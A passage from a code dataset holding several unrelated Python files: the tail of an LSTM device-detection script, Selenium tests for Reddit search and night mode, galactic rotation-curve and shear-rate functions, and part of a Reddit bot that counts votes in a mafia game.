f)\r\n\r\n\t\tprint(\"Max distance for each class: \")\r\n\t\tprint(json.dumps(max_distance, sort_keys=True))\r\n\t\twith open(\"max_distance.json\", \"w\") as f:\r\n\t\t\tjson.dump(max_distance, f)\r\n\r\n\t\tprint(\"Incorrect Labels: \")\r\n\t\tprint(json.dumps(wrong_id, sort_keys=True))\r\n\t\twith open(\"Incorrect_Labels.json\", \"w\") as f:\r\n\t\t\tjson.dump(wrong_id, f)\r\n\r\n\treturn\r\n\r\n\t\r\n\r\ndef recurrent_neural_network_model(xplaceholder, n_features, n_units, n_classes):\r\n # giving the weights and biases random values\r\n\tlayer ={ 'weights': tf.Variable(tf.random.normal([n_units, n_classes])),'bias': tf.Variable(tf.random.normal([n_classes]))}\r\n\r\n\t#x = tf.reshape(xplaceholder, [-1, n_features])\r\n\tx = tf.split(xplaceholder, n_features, 1)\r\n\r\n # x is a 2-dimensional Tensor and it is sliced along the dimension 1 (columns),\r\n # each slice is an element of the sequence given as input to the LSTM layer.\r\n # creates a LSTM layer and instantiates variables for all gates.\r\n # rnn_size is the size of your hidden state (both c and h in a LSTM).\r\n\t#lstm_cell = tf.compat.v1.nn.rnn_cell.LSTMCell(n_units)\r\n\tlstm_cell = tf.compat.v1.nn.rnn_cell.MultiRNNCell([tf.compat.v1.nn.rnn_cell.LSTMCell(n_units),tf.compat.v1.nn.rnn_cell.LSTMCell(n_units)])\r\n # outputs contains the output for each slice of the layer\r\n # sate contains the final values of the hidden state\r\n\toutputs, states = tf.compat.v1.nn.static_rnn(lstm_cell, x, dtype=tf.float32)\r\n\t\r\n # for each element (, 1)) of the input sequence.\r\n\toutput = tf.matmul(outputs[-1], layer['weights']) + layer['bias']\r\n\t\r\n\treturn output\r\n\r\ndef setup_neural_network(xplaceholder, yplaceholder, n_features, n_units, n_classes):\r\n\tlogit = recurrent_neural_network_model(xplaceholder, n_features, n_units, n_classes)\r\n\r\n\tlogit = tf.reshape(logit, [-1, n_classes])\r\n\tprint(logit.shape)\r\n\r\n\tcorrect_pred = tf.equal(tf.argmax(logit,1), tf.argmax(yplaceholder))\r\n\taccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32),name=\"accuracy\")\r\n\r\n\tpred = tf.nn.softmax(logit, name=\"pred\")\r\n\r\n\tcost = tf.reduce_mean(tf.compat.v2.nn.softmax_cross_entropy_with_logits(logits=logit, labels=yplaceholder), name=\"cost\")\r\n\toptimizer = tf.compat.v1.train.AdamOptimizer().minimize(cost)\r\n\treturn cost, optimizer, logit, accuracy, pred\r\n\r\ndef train_neural_network(sess, X_train,y_train,xplaceholder,yplaceholder,cost,optimizer, accuracy, iters):\r\n\tloss_total = 0\r\n\tloss = 0\r\n\ti = 0\r\n\tbatch_loss = 0\r\n\tbatch_acc = 0\r\n\ttotal_acc = 0\r\n\tfor i in range(8):\r\n\t\tfor c in range(len(X_train)):\r\n\t\t\tbatch_x = np.array(X_train[c])\r\n\t\t\tbatch_y = np.array(y_train[c])\r\n\t\t\t# runs the computation subgraph necessary for the specified operation.\r\n\t\t\t_, loss, acc = sess.run([optimizer, cost, accuracy], feed_dict={xplaceholder: batch_x, yplaceholder: batch_y})\r\n\t\t\tbatch_loss += loss\r\n\t\t\tbatch_acc += acc\r\n\t\tloss_total += batch_loss\r\n\t\ttotal_acc += batch_acc\r\n\t\tbatch_acc = 0\r\n\t\tbatch_loss = 0\r\n\t\ti += 1\r\n\ttotal_acc_forEpoch = (total_acc/(iters*8))\r\n\tprint(\"Total loss for 8 epochs in train: \", loss_total)\r\n\tprint(\"Total accuracy for 8 epoch in train: \", total_acc_forEpoch)\r\n\treturn total_acc_forEpoch\r\n\r\ndef test_neural_network(sess, pred, xplaceholder, yplaceholder,c, y_test, max_distance, label_dist):\r\n\tprediction = pred.eval({xplaceholder: np.array(c), yplaceholder: np.array(y_test)}, session=sess)\r\n\t#pred = tf.nn.softmax(logit, name=\"pred\").eval({xplaceholder: np.array(c), yplaceholder: np.array(y_test)}, session=sess)\r\n\t#pred = tf.round(tf.nn.softmax(logit)).eval({xplaceholder: np.array(c), yplaceholder: np.array(y_test)})\r\n\tlast_pred = np.array(prediction[len(c)-1])\r\n\tmax_val = np.argmax(last_pred)\r\n\tlabel = np.argmax(np.array(y_test))\r\n\tcorrect = (y_test[max_val] == 1)\r\n\r\n\tdist = np.linalg.norm(np.array(y_test) - last_pred)\r\n\tlabel_dist[str(label)].append(dist)\r\n\t\"\"\"\r\n\t# Calc distance and compare to max\r\n\tif correct and last_pred[max_val] >= 0.80: # Accuracy greater than or equal to 80%\r\n\t\tdist = np.linalg.norm(np.array(y_test) - last_pred)\r\n\t\tif max_distance[str(max_val)] < (dist * 1.1):\r\n\t\t\tmax_distance[str(max_val)] = dist * 1.1 # 1.1 to add 10% buffer\r\n\t\"\"\"\r\n\r\n\treturn correct, max_val, label_dist\r\n\r\ndef __findMaxDist(label_dist):\r\n\tmax_dist = {}\r\n\t\r\n\tfor key in label_dist:\r\n\t\torder_dist = label_dist[key]\r\n\t\tif order_dist != []:\r\n\t\t\torder_dist.sort()\r\n\t\t\t\"\"\"\r\n\t\t\t#For testing\r\n\t\t\tld = np.asarray(order_dist)\r\n\t\t\twith open(os.path.join(os.getcwd(),str(\"distance\" + \"-\" + str(key) + \".csv\")), 'wb') as f:\r\n\t\t\t\tnp.savetxt(f, ld, delimiter=\",\")\r\n\t\t\t\"\"\"\r\n\t\t\tlabel_dist[key] = order_dist\r\n\t\t\tdist_len = len(order_dist)\r\n\t\t\t\"\"\"\t\r\n\t\t\tmedian = order_dist[int(dist_len*.5)]\r\n\t\t\tQ1 = order_dist[int(dist_len*.25)]\r\n\t\t\tQ3 = order_dist[int(dist_len*.75)]\r\n\t\t\tIQR = Q3 - Q1\r\n\t\t\t\r\n\t\t\tmaximum = Q3 + 1.5*IQR\r\n\t\t\t\"\"\"\r\n\t\t\tboundary = int(dist_len*.9) # Boundary set at 90%\r\n\t\t\tmaximum = order_dist[boundary]\r\n\r\n\t\t\tmax_dist[key] = maximum\r\n\treturn max_dist\r\n\r\nmain()","repo_name":"baholman/Neural-Network-for-Device-Detection","sub_path":"Neural_Network_tf_fromCSV.py","file_name":"Neural_Network_tf_fromCSV.py","file_ext":"py","file_size_in_byte":17380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11348130248","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom webdriver_manager.chrome import ChromeDriverManager\n\n\nclass Testing_Class:\n def test_Search(self):\n browser = webdriver.Chrome(ChromeDriverManager().install())\n browser.get(\"https://www.reddit.com/\")\n browser.implicitly_wait(30)\n browser.find_element(By.ID, \"header-search-bar\").send_keys(\"cats\")\n browser.find_element(By.ID, \"header-search-bar\").send_keys(Keys.RETURN)\n expected_text = \"r/cats\"\n found_text = browser.find_element(\n By.XPATH, \"//*[contains(text(), '{0}')]\".format(expected_text)\n ).text\n browser.close()\n assert expected_text == found_text\n\n def test_NightMode(self):\n browser = webdriver.Chrome(ChromeDriverManager().install())\n browser.get(\"https://www.reddit.com/\")\n browser.implicitly_wait(30)\n browser.find_element(By.ID, \"USER_DROPDOWN_ID\").click()\n browser.find_elements(\n By.XPATH, \"//*[contains(text(), '{0}')]\".format(\"Night Mode\")\n )[0].click()\n browser.find_element(By.ID, \"USER_DROPDOWN_ID\").click()\n res = browser.find_element(\n By.CSS_SELECTOR,\n \"button[role='switch']\",\n ).get_attribute(\"aria-checked\")\n browser.close()\n assert res == \"true\"\n","repo_name":"Den-Kov59/UI_Tests","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2918482628","text":"import numpy as np\n\ndef solid_body_rotation_curve(R, R_d=1.0, Rsun=8.5, V0=220, normalize=True):\n \"\"\"\n Solid body rotation curve for testing.\n\n .. math::\n V(R) = R\n\n Parameters\n ----------\n R : float or array\n cylindrical radius\n \"\"\"\n V = R * R_d / Rsun\n if not normalize:\n V *= V0\n return V\n\n\ndef constant_shear_rate(R, R_d=1.0, Rsun=8.5, S0=25, normalize=True):\n \"\"\"\n Constant shear for testing.\n\n .. math::\n V(R) = cte\n\n Parameters\n ----------\n R : float or array\n cylindrical radius\n \"\"\"\n S = np.ones_like(R)\n if not normalize:\n S *= S0\n return S\n\n\ndef simple_rotation_curve(R, R_d=1.0, Rsun=8.5, V0=220, normalize=True,\n fraction=0.25/8.5):\n r\"\"\"\n Simple flat rotation curve\n\n .. math::\n V = V_0 \\left[1-\\exp(-R/(f R_\\odot)\\right]\n\n with fraction :math:`= f`, Rsun :math:`= R_\\odot`, V0 :math:`= V_0`\n\n Parameters\n ----------\n R : float or array\n radial coordinate\n Rsun : float or array\n sun's radius in kpc. Default: 8.5 kpc\n R_d : float\n unit of R in kpc [e.g. R_d=(disk radius in kpc)\n for r=0..1 within the disk]. Default: 1.0\n V0 : float\n Circular velocity at infinity (i.e. at the flat part).\n Default: 220 (km/s)\n fraction : float\n Fraction of the solar radius at which the profile decays\n exponentially. Default: 0.03 (i.e. 250 pc for Rsun=8.5).\n normalize : bool\n If True , with result normalized to unit at solar radius,\n if False, the result will be in units of `V0`.\n\n Returns\n -------\n same as `R`\n rotation curve\n \"\"\"\n V = V0*(1.0-np.exp(-R*R_d/(fraction*Rsun)))\n if normalize:\n Vsol = simple_rotation_curve(Rsun, R_d=1.0, Rsun=Rsun, V0=V0,\n normalize=False, fraction=fraction)\n V /= Vsol\n return V\n\n\ndef simple_shear_rate(R, R_d=1.0, Rsun=8.5, V0=220, normalize=True,\n fraction=0.25/8.5):\n \"\"\"\n A simple shear rate profile, compatible with the\n :func:`simple_rotation_curve` .\n\n\n Parameters\n ----------\n R : float or array\n radial coordinate\n Rsun : float or array\n sun's radius in kpc. Default: 8.5 kpc\n R_d : float\n unit of R in kpc [e.g. R_d=(disk radius in kpc)\n for r=0..1 within the disk]. Default: 1.0\n V0 : float\n Circular velocity at infinity (i.e. at the flat part).\n Default: 220 (km/s)\n fraction : float\n Fraction of the solar radius at which the profile decays\n exponentially. Default: 0.03 (i.e. 250 pc for Rsun=8.5).\n normalize : bool\n If True , with result normalized to unit at solar radius,\n if False, the result will be in km/s for R and Rsun in kpc\n\n Returns\n -------\n same as `R`\n shear rate\n \"\"\"\n # Computes the shear rate ( rdOmega/dr = dV/dr - V/r )\n x = R*R_d/(fraction*Rsun)\n dVdr = V0/(fraction*Rsun)*np.exp(-x)\n Omega = V0*(1.0-np.exp(-x))/(R*R_d)\n S = dVdr - Omega\n if normalize:\n Ssol = simple_shear_rate(Rsun, R_d=1.0, Rsun=Rsun, V0=V0,\n normalize=False, fraction=fraction)\n S /= Ssol\n return S\n\n# Coefficients used in the polynomial fit of Clemens (1985)\ncoef_Clemens = {\n 'A': [-17731.0,54904.0, -68287.3, 43980.1, -15809.8, 3069.81, 0.0],\n 'B': [-2.110625, 25.073006, -110.73531, 231.87099, -248.1467, 325.0912],\n 'C': [0.00129348, -0.08050808, 2.0697271, -28.4080026, 224.562732,\n -1024.068760,2507.60391, -2342.6564],\n 'D': [234.88] }\n# Ranges used in the polynomial fit of Clemens (1985)\nranges_Clemens = {\n 'A': [0,0.09],\n 'B': [0.09,0.45],\n 'C': [0.45,1.60],\n 'D': [1.60,1000]\n }\n\ndef Clemens_Milky_Way_rotation_curve(R, R_d=1.0, Rsun=8.5, normalize=True):\n \"\"\"\n Rotation curve of the Milky Way obtained by `Clemens (1985)\n `_\n\n Parameters\n ----------\n R : float or array\n radial coordinate\n Rsun : float or array\n sun's radius in kpc. Default: 8.5 kpc\n R_d : float\n unit of R in kpc [e.g. R_d=(disk radius in kpc)\n for r=0..1 within the disk]. Default: 1.0\n normalize : bool\n If True , with result normalized to unit at solar radius,\n if False, the result will be in km/s for R and Rsun in kpc\n\n Returns\n -------\n same as `R`\n rotation curve\n \"\"\"\n\n # If the function was called for a scalar\n if not hasattr(R, \"__len__\"):\n R = np.array([R,])\n scalar = True\n else:\n scalar = False\n V = R.copy()\n\n for x in coef_Clemens:\n # Construct polynomials\n pol_V = np.poly1d(coef_Clemens[x])\n # Reads the ranges\n min_r, max_r = ranges_Clemens[x]\n # Sets the index (selects the relevant range)\n idx = R*R_d/Rsun >= min_r\n idx *= R*R_d/Rsun < max_r\n # Computes the shear rate ( rdOmega/dr = dV/dr - V/r )\n V[idx] = pol_V(R[idx]*R_d)\n\n if normalize:\n # Normalizes at solar radius\n Vsol = Clemens_Milky_Way_rotation_curve(Rsun, R_d=1.0, Rsun=Rsun,\n normalize=False)\n V /= Vsol\n\n if scalar:\n V = V[0]\n\n return V\n\n\ndef Clemens_Milky_Way_shear_rate(R, R_d=1.0, Rsun=8.5, normalize=True):\n \"\"\"\n Shear rate of the Milky Way based on the rotation curve obtained by\n `Clemens (1985) `_\n\n Parameters\n ----------\n R : float or array\n radial coordinate\n Rsun : float or array\n sun's radius in kpc. Default: 8.5 kpc\n R_d : float\n unit of R in kpc [e.g. R_d=(disk radius in kpc)\n for r=0..1 within the disk]. Default: 1.0\n normalize : bool\n If True , with result normalized to unit at solar radius,\n if False, the result will be in km/s for R and Rsun in kpc\n\n Returns\n -------\n same as `R`\n shear rate profile, with\n \"\"\"\n\n # If the function was called for a scalar\n if not hasattr(R, \"__len__\"):\n R = np.array([R,])\n scalar = True\n else:\n scalar = False\n S = R.copy()\n\n for x in coef_Clemens:\n # Construct polynomials\n pol_V = np.poly1d(coef_Clemens[x])\n dVdr = pol_V.deriv()\n\n # Reads the ranges\n min_r, max_r = ranges_Clemens[x]\n # Sets the index (selects the relevant range)\n idx = R*R_d/Rsun >= min_r\n idx *= R*R_d/Rsun < max_r\n # Computes the shear rate ( rdOmega/dr = dV/dr - V/r )\n S[idx] = dVdr(R[idx]*R_d) - pol_V(R[idx]*R_d)/(R[idx]*R_d)\n\n if normalize:\n # Normalizes at solar radius\n Ssol = Clemens_Milky_Way_shear_rate(Rsun, R_d=1.0, Rsun=Rsun,\n normalize=False)\n S /= Ssol\n\n if scalar:\n S = S[0]\n\n return S\n\n\ndef constant_scale_height(R, h_d=1.0, R_d=1.0, Rsun=8.5):\n \"\"\" Constant scale height for testing.\"\"\"\n return np.ones_like(R)*h_d\n\n\ndef exponential_scale_height(R, h_d=1.0, R_HI=5, R_d=1.0, Rsun=8.5):\n r\"\"\"\n Exponential disk scale-heigh profile profile\n\n .. math::\n h(R)=\\exp\\left(\\frac{R-R_\\odot}{R_{\\rm sh}}\\right)\n\n Parameters\n ----------\n R : float or array\n radial coordinate\n h_d : float\n normalization of the scaleheight. Default: 1.0\n R_d : float\n unit of R in kpc [e.g. R_d=(disk radius in kpc)\n for r=0..1 within the disk]. Default: 1.0\n R_HI : float\n Parameter :math:`R_{\\rm sh}`, characterizes how \"flared\" the disc is.\n Rsun : float\n Sun's radius in kpc. Default: 8.5 kpc\n\n Returns\n ----------\n same as `R`\n scale height normalized to h_d at the solar radius\n \"\"\"\n # Makes sure we are dealing with an array\n return h_d * np.exp((R*R_d - Rsun)/R_HI)\n\n\ndef Omega(rotation_curve, R, Rsun=8.5, R_d=1.0, normalize=True, **kwargs):\n \"\"\"\n Simple wrapper to avoid making mistakes when using dimensionless\n (aka normalized) quantities.\n \"\"\"\n\n V = rotation_curve(R, R_d=R_d, Rsun=Rsun, normalize=normalize, **kwargs)\n\n Om = V/(R*R_d)\n if normalize:\n Om = Om * Rsun\n return Om\n\ndef regularize(r, Om, S, r_reg, Om_reg, k=4):\n \"\"\"\n Avoids unphysically large values of Omega and Shear near the origin\n applying an exponential cutoff on Omega to prevent it.\n\n .. math::\n \\Omega(r) = \\exp\\left[-(r_\\\\xi/r)^k\\\\right]\\left[ \\\\tilde\\Omega(r)-\\Omega_\\\\xi\\\\right] + \\Omega_\\\\xi\\,,\n\n and\n\n .. math::\n S(r) = e^{-(r_\\\\xi/r)^k}\\left\\{k\\left(\\\\frac{r_\\\\xi}{r}\\\\right)^k\\\\left[\\\\tilde\\Omega(r)\n -\\Omega_\\\\xi \\\\right] +\\\\tilde S \\\\right\\}\n\n\n Parameters\n ----------\n R : array\n radial coordinate\n Om : float\n Angular velocity profile\n r_reg : float\n regularization radius\n Om_reg : float\n Value of Omega to be used for math:`r \\lesssim r_{reg`\n k : float\n How sharp is the cutoff. Default: 4\n\n \"\"\"\n # Sets up exponential cutoff function\n f = lambda x: np.exp(-(x/r_reg)**-k)\n # Applies it in a d2o-compatible manner\n exp_cut = distribute_function(f, r)\n\n Om_new = exp_cut*(Om-Om_reg) + Om_reg\n\n S_new = exp_cut*( k*(r_reg/r)**k*(Om-Om_reg) + S)\n\n return Om_new, S_new\n\n","repo_name":"luizfelippesr/galmag","sub_path":"galmag/disk_profiles.py","file_name":"disk_profiles.py","file_ext":"py","file_size_in_byte":9418,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"29055536842","text":"#!/usr/bin/env python2.7\n\nimport os\nimport re\nimport praw\nimport json\nimport copy\nimport time\nimport pytz\nimport creds\nimport config\nimport os.path\nimport logging\nimport argparse\nimport requests\nimport datetime\nimport traceback\nimport prettylog\nimport collections\nimport praw.objects\nimport simpletemplate\n\nfrom HTMLParser import HTMLParser\n\nl = prettylog.ColoredLogger(__name__)\n\ndebug_levels = {\n \"critical\": logging.CRITICAL,\n \"error\": logging.ERROR,\n \"warning\": logging.WARNING,\n \"info\": logging.INFO,\n \"debug\": logging.DEBUG\n}\n\nparser = argparse.ArgumentParser(description=\"Plounge mafia vote counting bot\")\nparser.add_argument(\"--log_level\", help=\"Log level to use\", choices =\n debug_levels.keys(), default = 'info')\nparser.add_argument(\"--oneshot\", action='store_true', help=\"run state transition once\")\nparser.add_argument(\"--update_delay\", type=int, default=5, help=\"time in minutes between state updates\")\nparser.add_argument(\"--dry-run\", action='store_true', help=\"Don't actually post anything\")\nparser.add_argument(\"--oauth-login\", action='store_true', help=\"perform Oauth login\")\n\nVote = collections.namedtuple(\"Vote\", [\"by\", \"target\", \"time\"])\nNomination = collections.namedtuple('Nomination', ['player', 'yays', 'nays', 'up_for_trial', 'vote_post_id', 'timestamp'])\n\ndef Tree(dict_ = {}):\n tree = collections.defaultdict(Tree)\n tree.update(dict_)\n return tree\n\ndef chunk(l,n):\n for i in range(0,len(l),n):\n yield l[i:i+n]\n\nknown_dead_comments = set()\n\n#replace_more_comments is broken because MoreComments.comments() is broken.\n#This is broken I think because the reddit API is broken and doesn't return an\n#additional morecomments object when it should. This also affects the website\ndef get_more_comments(self, update = True):\n if self._comments is not None:\n return self._comments\n\n children = {x for x in self.children if 't1_{}'.format(x)\n not in self.submission._comments_by_id}\n\n self._comments = []\n if not children:\n return self._comments\n\n n_attempts = 0\n old_len = len(children)\n while children:\n data = {'children': ','.join(children),\n 'link_id': self.submission.fullname,\n 'r': str(self.submission.subreddit)}\n\n\n if self.submission._comment_sort:\n data['where'] = self.submission._comment_sort\n\n url = self.reddit_session.config['morechildren']\n response = self.reddit_session.request_json(url, data = data)\n self._comments.extend(response['data']['things'])\n children.difference_update(set([x.id for x in self._comments]))\n n_attempts += 1\n if n_attempts > 10 or old_len == len(children):\n if not children.issubset(known_dead_comments):\n l.error(\"Could not fetch comments {} after {} attempts\".format(children, n_attempts))\n known_dead_comments.update(children)\n break\n old_len = len(children)\n\n if update:\n for comment in self._comments:\n comment._update_submission(self.submission)\n\n return self._comments\n\n#replace_more_comments is broken (plus makes more requests than we need)\ndef all_comments(replies):\n more_comments = []\n for reply in replies:\n if isinstance(reply, praw.objects.MoreComments):\n more_comments.append(reply)\n else:\n yield reply\n while more_comments:\n more = more_comments.pop()\n maybe_more = get_more_comments(more)\n for additional_comment in get_more_comments(more):\n if isinstance(additional_comment, praw.objects.MoreComments):\n more_comments.append(additional_comment)\n else:\n yield additional_comment\n\nnominate_re = re.compile(\"\"\"\n(nominate|vote|lynch)? #vote or nominate is for clarity only, they have the same effect\n\\s*:?\\s* #could be a colon or not\n(/u/)? #might start with /u/\n(?Pno\\s*lynch|[^.*~\\s]+) #username may consist of any characters except whitespace and *\n #'no lynch' is valid in traditional games, and contains a space\n\"\"\", re.VERBOSE)\n\nvote_re = re.compile(\"\"\"\n(vote)?:? #can start with vote or not\n\\s*\n(?P\n yay|lynch|yes|second| #many yes or no options. Must be synced with\n nay|pardon|no) # get_vote_from_post()\n\"\"\", re.VERBOSE)\n\nclass RedditHTMLParser(HTMLParser):\n def __init__(self):\n HTMLParser.__init__(self)\n self.nest_count = collections.defaultdict(int)\n self.possible_votes = []\n\n def handle_starttag(self, tag, attrs):\n self.nest_count[tag] += 1\n\n def handle_endtag(self, tag):\n self.nest_count[tag] -= 1\n\n def handle_data(self, data):\n if self.nest_count[\"strong\"] > 0 and self.nest_count[\"del\"] == 0:\n self.possible_votes.append(data)\n\ndef get_possible_votes(post_contents):\n parser = RedditHTMLParser()\n parser.feed(parser.unescape(post_contents))\n return parser.possible_votes\n\ndef get_nomination_from_post(post_contents, valid_names):\n valid_votes = []\n for possible_vote in get_possible_votes(post_contents):\n for match in nominate_re.finditer(possible_vote.lower().strip()):\n if not match.group('user'):\n continue\n username = match.group('user').strip().lower()\n if username in valid_names:\n valid_votes.append(username)\n if valid_votes:\n return valid_votes[-1]\n\ndef get_vote_from_post(post_contents):\n valid_votes = []\n for possible_vote in get_possible_votes(post_contents):\n for match in vote_re.finditer(possible_vote.lower().strip()):\n if not match.group('vote'):\n continue\n vote = match.group('vote').strip().lower()\n if vote in ('yay', 'lynch', 'yes', 'second'):\n valid_votes.append(True)\n elif vote in ('nay', 'pardon', 'no'):\n valid_votes.append(False)\n if valid_votes:\n return valid_votes[-1]\n\ndef compare_dicts(old, new):\n old_items = set([(k,) + tuple(v.items()) for k,v in old.iteritems()])\n new_items = set([(k,) + tuple(v.items()) for k,v in new.iteritems()])\n\n additions = new_items.difference(old_items)\n removals = old_items.difference(new_items)\n\n additions = {i[0]: dict(i[1:]) for i in additions}\n removals = {i[0]: dict(i[1:]) for i in removals}\n\n return additions, removals\n\ndef get_edited_time(comment):\n return comment.edited if comment.edited else comment.created_utc\n\ndef timestamp_to_date(timestamp):\n return datetime.datetime.fromtimestamp(timestamp, pytz.utc).isoformat()\n\nclass VoteBot(object):\n def __init__(self, reddit, credentials, args):\n self.bot_username = credentials.bot_username\n self.bot_password = credentials.bot_password\n self.authorized_users = args.authorized_users\n self.known_invalid_votes = set()\n self.state = Tree()\n self.reddit = reddit\n self.args = args\n self.max_trials = 5\n\n def setup_dir(self):\n if not os.path.exists(self.args.output_dir):\n os.makedirs(self.args.output_dir)\n\n def process_commands(self):\n l.debug(\"Processing commands for {}\".format(self.args.name))\n new_state = copy.deepcopy(self.state)\n pms = self.reddit.get_inbox(limit = None)\n have_nominations = False\n have_votes = False\n most_recent_id = None\n alive_players = set(new_state[\"alive_players\"])\n dead_players = set(new_state[\"dead_players\"])\n voteless_players = set(new_state[\"voteless_players\"])\n voteless_players.difference_update(dead_players)\n alive_players.difference_update(dead_players)\n pms_reversed = []\n for pm in pms:\n if \":\" not in pm.subject:\n continue\n game_name, command = pm.subject.split(':')\n game_name = game_name.lower().strip()\n command = command.lower().strip()\n if not (game_name == self.args.name.lower() or game_name == \"*\"):\n continue\n if pm.id == self.state['most_recent_pm_id']:\n break\n if not most_recent_id:\n most_recent_id = pm.id\n if pm.author.name.lower() not in self.authorized_users:\n continue\n pms_reversed.append(pm)\n if command == \"reset\":\n break\n\n pms_reversed.reverse()\n for pm in pms_reversed:\n game_name, command = pm.subject.split(':')\n game_name = game_name.lower().strip()\n command = command.lower().strip()\n l.debug('command: {}'.format(command))\n if command == \"end nominations\" and not have_nominations:\n l.info(\"Command: end nominations\")\n new_state['nominations_ended_at'] = pm.created_utc\n have_nominations = True\n if command == \"end votes\" and not have_votes:\n l.info(\"Command: end votes\")\n new_state['votes_ended_at'] = pm.created_utc\n have_votes = True\n if command == \"nominations\" and not have_nominations:\n l.info(\"Command: new nominations thread\")\n new_state['nominations_url'] = pm.body\n new_state['nominations_ended_at'] = None\n new_state['counting_nominations'] = True\n have_nominations = True\n if command == \"votes\" and not have_votes:\n l.info(\"Command: new votes thread\")\n new_state['votes_url'] = pm.body.split()[0]\n new_state['nominated_players'] = pm.body.split()[1:]\n new_state['votes_ended_at'] = None\n new_state['vote_threshold'] = None\n new_state['counting_votes'] = True\n have_votes = True\n if command in ('alive', 'dead', 'gone', 'voteless', 'voteful'):\n player_set = set([x.lower() for x in pm.body.split() if len(x) > 3])\n if command == \"alive\":\n l.info(\"Command: alive players\")\n alive_players.update(player_set)\n elif command == \"dead\":\n l.info(\"Command: dead players\")\n alive_players.difference_update(player_set)\n dead_players.update(player_set)\n elif command == \"gone\":\n l.info(\"Command: gone players\")\n alive_players.difference_update(player_set)\n dead_players.difference_update(player_set)\n voteless_players.difference_update(player_set)\n elif command == \"voteless\":\n l.info(\"Voteless players\")\n voteless_players.update(player_set)\n elif command == \"voteful\":\n l.info(\"Voteful players\")\n voteless_players.difference_update(player_set)\n else:\n l.warning(\"Unknown command {}\".format(command))\n if command == \"max nominations\":\n try:\n self.max_trials = int(pm.body.strip())\n except ValueError:\n l.warning(\"Got invalid value for max nominations: {}\".format(pm.body.strip()))\n if command == \"reset\":\n l.warning(\"Got reset command\")\n new_state = Tree()\n alive_players = set()\n dead_players = set()\n voteless_players = set()\n if command == \"vote threshold\":\n l.info(\"Command: new vote threshold\")\n try:\n threshold = int(pm.body)\n except ValueError:\n l.warn(\"Invalid number given for vote threshold: {}\".format(pm.body))\n new_state['vote_threshold'] = threshold\n\n new_state['alive_players'] = list(alive_players)\n new_state['dead_players'] = list(dead_players)\n new_state['voteless_players'] = list(voteless_players)\n if most_recent_id:\n new_state['most_recent_pm_id'] = most_recent_id\n l.debug(\"Done processing commands, updating state\")\n self.state = new_state\n\n def get_bot_post(self, submission_url, tag = None):\n l.debug(\"Fetching submission from {}\".format(submission_url))\n submission = praw.objects.Submission.from_url(self.reddit, submission_url)\n l.debug(\"Got submission\")\n comment_to_update = None\n for comment in all_comments(submission.comments):\n if comment.author and comment.author.name == self.bot_username:\n if tag is None:\n comment_to_update = comment\n break\n else:\n if comment.body.lower().find('###{}###'.format(tag.lower())) != -1:\n comment_to_update = comment\n break\n\n if comment_to_update:\n l.debug(\"Got comment\")\n return submission, comment_to_update\n\n def get_votes(self, vote_post, target_player, old_votes, deadline, get_vote = get_vote_from_post):\n valid_names = {x.lower() for x in self.state['alive_players']}\n #can_vote = valid_names.difference({x.lower() for x in state['voteless_players']})\n can_vote = valid_names\n votes = {}\n for vote_comment in all_comments(vote_post.replies):\n if not vote_comment.author:\n continue\n vote_result = get_vote(vote_comment.body_html)\n if vote_result is None:\n if vote_comment.id not in self.known_invalid_votes:\n l.warn(\"Did not get vote result from {}\".format(vote_comment.body_html.encode('ascii', errors='ignore')))\n self.known_invalid_votes.add(vote_comment.id)\n continue\n\n caster = vote_comment.author.name.lower()\n if caster not in can_vote:\n if vote_comment.id not in self.known_invalid_votes:\n #voteless is kinda-secret\n if caster not in valid_names:\n l.info(\"{} cannot vote ({} can)!\".format(caster, valid_names))\n self.known_invalid_votes.add(vote_comment.id)\n continue\n\n #Try to find the time the vote was cast\n timestamp = get_edited_time(vote_comment)\n\n #If the comment was edited, but the vote wasn't changed, count the time\n #as the time of the original vote\n if caster in old_votes:\n old_vote = old_votes[caster]\n if old_vote[\"lynch\"] == vote_result:\n timestamp = old_vote[\"timestamp\"]\n\n if deadline and timestamp > deadline:\n continue\n\n #if multiple votes are present, count the latest one\n if (caster not in votes) or votes[caster]['timestamp'] > timestamp:\n votes[caster] = {\"for\" : target_player,\n #Confusing terminology: in nomination games,\n #'lynch' is a bool. In tradition games, it is a\n #string with the same meaning as 'for in nomination\n #games. 'for' is None in traditional games\n \"lynch\" : vote_result,\n \"timestamp\": timestamp}\n\n return votes\n\n def sort_nominations(self, post_state):\n def votes(nominee):\n vote_info = post_state['current_votes'][nominee].values()\n votes = [v['lynch'] for v in vote_info if v['timestamp'] < deadline]\n yays = sum(votes)\n nays = len(votes) - yays\n return yays, nays\n deadline = post_state['deadline'] if post_state['deadline'] else float('Inf')\n sorted_nominations = post_state['current_nominations'].items()\n sorted_nominations.sort(key = lambda x: (x[0] not in self.state['dead_players'],\n votes(x[0])[1] - votes(x[0])[0],\n x[1]['timestamp']))\n n_trials = 0\n nominations = []\n for nominee, nomination in sorted_nominations:\n yays, nays = votes(nominee)\n up_for_trial = nominee not in self.state['dead_players'] and n_trials < self.max_trials and yays > nays\n if up_for_trial:\n n_trials += 1\n nominations.append(Nomination(player = nominee,\n yays = yays,\n nays = nays,\n up_for_trial = up_for_trial,\n vote_post_id = nomination['ack_id'],\n timestamp = nomination['timestamp']))\n\n nominations.sort(key = lambda x: (not bool(x.yays + x.nays), x.timestamp))\n\n return nominations\n\n def fix_case(self, username):\n if username in self.state['name_case_cache']:\n return self.state['name_case_cache'][username]\n\n l.debug(\"Finding proper name for {}\".format(username))\n try:\n user = praw.objects.Redditor(self.reddit, username)\n except requests.HTTPError:\n l.warn(\"Username {} doesn't appear to exist!\".format(username))\n self.state['name_case_cache'][username] = username\n return username\n #there should be a better way...\n try:\n comment = user.get_comments().next()\n except:\n comment = None\n if not comment:\n l.warn(\"No comments by {}? can't work out their proper name!\".format(username))\n self.state['name_case_cache'][username] = username\n return username\n l.debug(\"{} -> {}\".format(username, comment.author.name))\n self.state['name_case_cache'][username] = comment.author.name\n return comment.author.name\n\n def update_post(self, submission, post, post_template, target = None):\n l.debug(\"Updating post from template {}\".format(post_template))\n if 